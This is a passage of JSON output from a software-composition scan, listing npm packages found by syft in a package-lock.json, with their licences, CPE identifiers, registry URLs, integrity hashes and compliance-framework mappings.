"cpe:2.3:a:normalize:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/normalize-svg-path@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/normalize-svg-path/-/normalize-svg-path-1.1.0.tgz", "integrity": "sha512-r9KHKG2UUeB5LoTouwDzBy2VxXlHsiM6fyLQvnJa0S5hrhzqElH/CH7TUGhT1fVvIYBIKf3OpY4YJ4CK+iaqHg==", "dependencies": { "svg-arc-to-cubic-bezier": "^3.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "bb2a72a38fc8e367", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: object-assign 4.1.1", "title": "object-assign 4.1.1", "description": "Package discovered: object-assign 4.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d7b65c8670c0c943", "name": "object-assign", "version": "4.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:object-assign:object-assign:4.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object-assign:object_assign:4.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object_assign:object-assign:4.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object_assign:object_assign:4.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object:object-assign:4.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object:object_assign:4.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/object-assign@4.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", "integrity": "sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7280439ae019eb34", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: object-hash 3.0.0", "title": "object-hash 3.0.0", "description": "Package discovered: object-hash 3.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f0415e28bd0fa73d", "name": "object-hash", "version": "3.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:object-hash:object-hash:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object-hash:object_hash:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object_hash:object-hash:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object_hash:object_hash:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object:object-hash:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object:object_hash:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/object-hash@3.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "570f098417dfedef", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: object-inspect 1.13.4", "title": "object-inspect 1.13.4", "description": "Package discovered: object-inspect 1.13.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "67701f4036faa68d", "name": "object-inspect", "version": "1.13.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:object-inspect:object-inspect:1.13.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object-inspect:object_inspect:1.13.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object_inspect:object-inspect:1.13.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object_inspect:object_inspect:1.13.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object:object-inspect:1.13.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:object:object_inspect:1.13.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/object-inspect@1.13.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz", "integrity": "sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "276b1e3a3b3501f5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: on-finished 2.3.0", "title": "on-finished 2.3.0", "description": "Package discovered: on-finished 2.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3329ff372baa3c68", "name": "on-finished", "version": "2.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:on-finished:on-finished:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on-finished:on_finished:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on_finished:on-finished:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on_finished:on_finished:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on:on-finished:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on:on_finished:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/on-finished@2.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz", "integrity": "sha512-ikqdkGAAyf/X/gPhXGvfgAytDZtDbr+bkNUJ0N9h5MI/dmdgCs3l6hoHrcUv41sRKew3jIwrp4qQDXiK99Utww==", "dependencies": { "ee-first": "1.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1ede69e18336ab8f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: on-finished 2.4.1", "title": "on-finished 2.4.1", "description": "Package discovered: on-finished 2.4.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9c42ff2fa50e9c68", "name": "on-finished", "version": "2.4.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:on-finished:on-finished:2.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on-finished:on_finished:2.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on_finished:on-finished:2.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on_finished:on_finished:2.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on:on-finished:2.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on:on_finished:2.4.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/on-finished@2.4.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", "dependencies": { "ee-first": "1.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "01ce9d2b89e4c438", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: on-headers 1.1.0", "title": "on-headers 1.1.0", "description": "Package discovered: on-headers 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c535b114447926f1", "name": "on-headers", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:on-headers:on-headers:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on-headers:on_headers:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on_headers:on-headers:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on_headers:on_headers:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on:on-headers:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:on:on_headers:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/on-headers@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/on-headers/-/on-headers-1.1.0.tgz", "integrity": "sha512-737ZY3yNnXy37FHkQxPzt4UZ2UWPWiCZWLvFZ4fu5cueciegX0zGPnrlY6bwRg4FdQOe9YU8MkmJwGhoMybl8A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "bd9248df9b4e52cf", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: once 1.4.0", "title": "once 1.4.0", "description": "Package discovered: once 1.4.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3f85171a571bc28a", "name": "once", "version": "1.4.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:once:once:1.4.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/once@1.4.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "92e0060edd98f736", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: otplib 12.0.1", "title": "otplib 12.0.1", "description": "Package discovered: otplib 12.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7b45ff9710a4aaac", "name": "otplib", "version": "12.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:otplib:otplib:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/otplib@12.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/otplib/-/otplib-12.0.1.tgz", "integrity": "sha512-xDGvUOQjop7RDgxTQ+o4pOol0/3xSZzawTiPKRrHnQWAy0WjhNs/5HdIDJCrqC4MBynmjXgULc6YfioaxZeFgg==", "dependencies": { "@otplib/core": "^12.0.1", "@otplib/preset-default": "^12.0.1", "@otplib/preset-v11": "^12.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1061878b64866643", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: p-limit 2.3.0", "title": "p-limit 2.3.0", "description": "Package discovered: p-limit 2.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c6cc7a145d3e597c", "name": "p-limit", "version": "2.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:p-limit:p-limit:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p-limit:p_limit:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p_limit:p-limit:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p_limit:p_limit:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p:p-limit:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p:p_limit:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/p-limit@2.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": 